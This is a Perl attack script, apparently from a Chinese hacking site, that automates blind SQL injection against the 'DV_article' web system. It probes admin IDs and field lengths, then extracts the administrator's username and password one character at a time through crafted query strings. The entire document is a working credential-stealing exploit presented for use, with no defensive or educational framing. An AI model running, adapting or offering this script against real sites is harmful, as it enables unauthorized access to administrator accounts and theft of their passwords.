#注意,此代码仅用于测试包含小写字母的口令,对于包含大写字母的口令无效! #!/usr/bin/perl #The script Crack user&pass for DV_article system #Code by wawa@21cn.com #Grouppage Http://www.Haowawa.com/ #Homepage Http://wawa.Haowawa.com/ use IO::Socket; system('cls'); $ARGC = @ARGV; if ($ARGC != 4) { print "\n\n"; print "\t* The script Crack user&pass for DV_article system *\n"; print "\n\t Welcom to www.Haowawa.com && wawa.haowawa.com\n"; print "\n\tExample: dvTxt.pl /txt/list.asp 53 \"没有找到相关文章\"\n"; print "\t dvTxt.pl \n\n\n"; exit; } $host = @ARGV[0]; $way = @ARGV[1]; $txtid = @ARGV[2]; $errinfo =@ARGV[3]; $port = 80; print "\n\t* Welcom to http://www.Haowawa.com && http://wawa.haowawa.com *\n"; print "\n\n开始在 $host 上进行测试,请等待......\n"; for ($adminid=1;$adminid<=100;$adminid++) { $way1 = "?id=$txtid%20AND%20$adminid=(select%20min(id)%20from%20admin%20where%20flag=1)"; &url;@res = &connect; #print @res; if ("@res" !~ /$errinfo/) { print "\n\t* 发现一管理员ID号为: $adminid \n"; last; } } for ($passlen=1;$passlen<=10;$passlen++) { $way1 = "?id=$txtid%20AND%20$passlen=(select%20len(password)%20from%20admin%20where%20id=$adminid)"; &url;@res = &connect; if ("@res" !~ /$errinfo/) { print "\n\t* 发现ID=$adminid的管理员的密码长度为: $passlen 位\n"; last; } } for ($userlen=1;$userlen<=20;$userlen++) { $way1 = "?id=$txtid%20AND%20$userlen=(select%20len(username)%20from%20admin%20where%20id=$adminid)"; &url;@res = &connect; if ("@res" !~ /$errinfo/) { print "\n\t* 发现ID=$adminid的管理员的用户名长度为: $userlen 位\n"; last; } } @dig=(0..9); @char=(a..z); @tchar=qw(` ~ ! + @ # $ ^ * \( \) _ = - { } [ ] : " ; < > ? | , . / \\); @dic=(@dig,@char,@tchar); @dic1=(@char,@dig,@tchar); print "\n开始尝试获取ID=$adminid的管理员的用户名及密码,请等待......\n"; for ($userlocat=1;$userlocat<=$userlen;$userlocat++) { foreach $usertemp(@dic1) { $user=$userdic.$usertemp; $way1 = "?id=$txtid%20AND%20'$user'=(select%20mid(username,1,$userlocat)%20from%20admin%20where%20id=$adminid)"; &url;@res = &connect; if ("@res" !~ /$errinfo/) { if ($userlocat==$userlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员名字是: $user\n";last;} print "\n\t* ID=$adminid的管理员名字的前 $userlocat 位为 $user"; $userdic=$userdic.$usertemp; last; } } } for ($passlocat=1;$passlocat<=$passlen;$passlocat++) { foreach $passtemp(@dic) { $pass=$passdic.$passtemp; $way1 = "?id=$txtid%20AND%20'$pass'=(select%20mid(password,1,$passlocat)%20from%20admin%20where%20id=$adminid)"; &url;@res = &connect; if ("@res" !~ /$errinfo/) { if ($passlocat==$passlen){print "\n\n\t* 获取成功!!! ID=$adminid的管理员密码是: $pass";last;} print "\n\t* ID=$adminid的管理员密码的前 $passlocat 位为 $pass"; $passdic=$passdic.$passtemp; last; } } } print "\n\n\n\t* 测试完毕. 获取到一个用户名为$user密码为$pass的管理员权限! *\n"; print "\n\n\n"; #system('pause'); sub url { $req = "GET $way$way1 HTTP/1.0\n". "Host: $host\n". "Referer: $host\n". "Cookie: \n\n"; } sub connect { my $connection = IO::Socket::INET->new(Proto =>"tcp", PeerAddr =>$host, PeerPort =>$port) || die "Sorry! Could not connect to $host \n"; print $connection $req; my @res = <$connection>; close $connection; return @res; }